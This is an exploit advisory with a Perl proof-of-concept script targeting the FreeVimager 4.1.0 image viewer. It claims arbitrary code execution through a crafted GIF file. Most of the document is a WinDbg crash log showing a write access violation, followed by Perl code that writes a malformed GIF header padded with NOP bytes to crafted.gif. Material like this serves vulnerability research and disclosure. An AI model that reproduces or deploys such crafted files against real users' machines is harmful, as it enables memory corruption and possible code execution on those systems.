#!/usr/bin/perl

FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution

Author: Jean Pascal Pereira <[email protected]>

Vendor URI: http://www.contaware.com

Vendor Decription:

This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video files,

ordinary audio files and audio CDs. There are many tools around doing that, but the aim of this

Freeware is to be a small and handy tool doing what it says and running also as a standalone

exe file (installer not necessary).

Debug info:

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86

Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\FreeVimager\FreeVimager.exe" C:\research\FreeVimager\crafted.gif

Symbol search path is: *** Invalid***

****************************************************************************

* Symbol loading may be unreliable without a symbol search path. *

* Use .symfix to have the debugger choose a symbol path. *

* After setting your symbol path, use .reload to refresh symbol locations. *

****************************************************************************

Executable search path is:

ModLoad: 00400000 00c9a000 image00400000

ModLoad: 7c900000 7c9b2000 ntdll.dll

ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll

ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll

ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll

ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll

ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll

ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll

ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll

ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll

ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll

ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll

ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll

ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV

ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll

ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll

ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll

ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll

ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll

ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll

ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll

ModLoad: 3d930000 3da16000 C:\WINDOWS\system32\WININET.dll

ModLoad: 00340000 00349000 C:\WINDOWS\system32\Normaliz.dll

ModLoad: 78130000 78263000 C:\WINDOWS\system32\urlmon.dll

ModLoad: 3dfd0000 3e1bb000 C:\WINDOWS\system32\iertutil.dll

(e48.568): Break instruction exception - code 80000003 (first chance)

ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL

ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll

ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll

ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime

ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\Wtsapi32.dll

ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll

ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll

ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.DLL

ModLoad: 76380000 76385000 C:\WINDOWS\system32\msimg32.dll

(e48.568): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080

eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216

*** WARNING: Unable to verify checksum for image00400000

*** ERROR: Module load completed but symbols could not be loaded for image00400000

image00400000+0x1c02c3:

005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=???

0:000> r;!exploitable -v;q

eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080

eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216

image00400000+0x1c02c3:

005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=???

HostMachine\HostUser

Executing Processor Architecture is x86

Debuggee is in User Mode

Debuggee is a live user mode debugging session on the local machine

Event Type: Exception

*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -

Exception Faulting Address: 0x2151c154

First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)

Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x50747228.0x58333273

Stack Trace:

image00400000+0x1c02c3

image00400000+0x1bfd07

image00400000+0x18abb4

kernel32!VirtualAllocEx+0x47

kernel32!VirtualAlloc+0x18

image00400000+0x18a0ef

image00400000+0x18a121

image00400000+0x24fb01

image00400000+0x24fc4e

image00400000+0x23be55

image00400000+0x95a48

image00400000+0x4fd8

image00400000+0xf054e

image00400000+0xea85e

ntdll!RtlFreeHeap+0x130

ntdll!RtlFreeHeap+0x130

kernel32!CreateActCtxW+0xb6c

kernel32!CreateActCtxW+0xcbf

Instruction Address: 0x00000000005c02c3

Proof of Concept:

my $crafted = "\x47\x49\x46\x38\x39\x61\x18\x00\x18\x00\xC4\x00\x00\xA2\xC5".
"\xE1\xEB\xF3\xF9\x8C\xB8\xDA\x49\x8E\xC3\x95\xBD\xDC\xFE\xFE".
"\xFF\x75\xAA\xD3\x38\x84\xBE\xD5\xE5\xF1\x5D\x9A\xCA\x26\x78".
"\xB8\x22\x76\xB7\xC4\xDA\xEC\xDD\xEA\xF4\x55\x96\xC8\xF4\xF8".
"\xFC\x89\xB5\xD8\xF1\xF6\xFA\x28\x79\xB8\x87\xB5\xD8\x31\x7F".
"\xBC\x23\x77\xB8\x9E\xC3\xE0\x9E\xC3\xDF\x68\xA1\xCE\xE6\xF0".
"\xF7\xFA\xFC\xFD\x1F\x74\xB6\x8E\xB9\xDA\xFF\xFF\xFF\x1E\x73".
"\xB5\x1E\x74\xB6\x21\xF9\x04\x00\x00\x00\x00\x00\x2C\x00\x00".
"\x00\x00\x18\x00\x18\x00\x00\xFB\x05\x60";

my $junk = "\x90" x 163;

open(C, ">:raw", "crafted.gif");
print C $crafted.$junk;
close(C);

http://0xffe4.org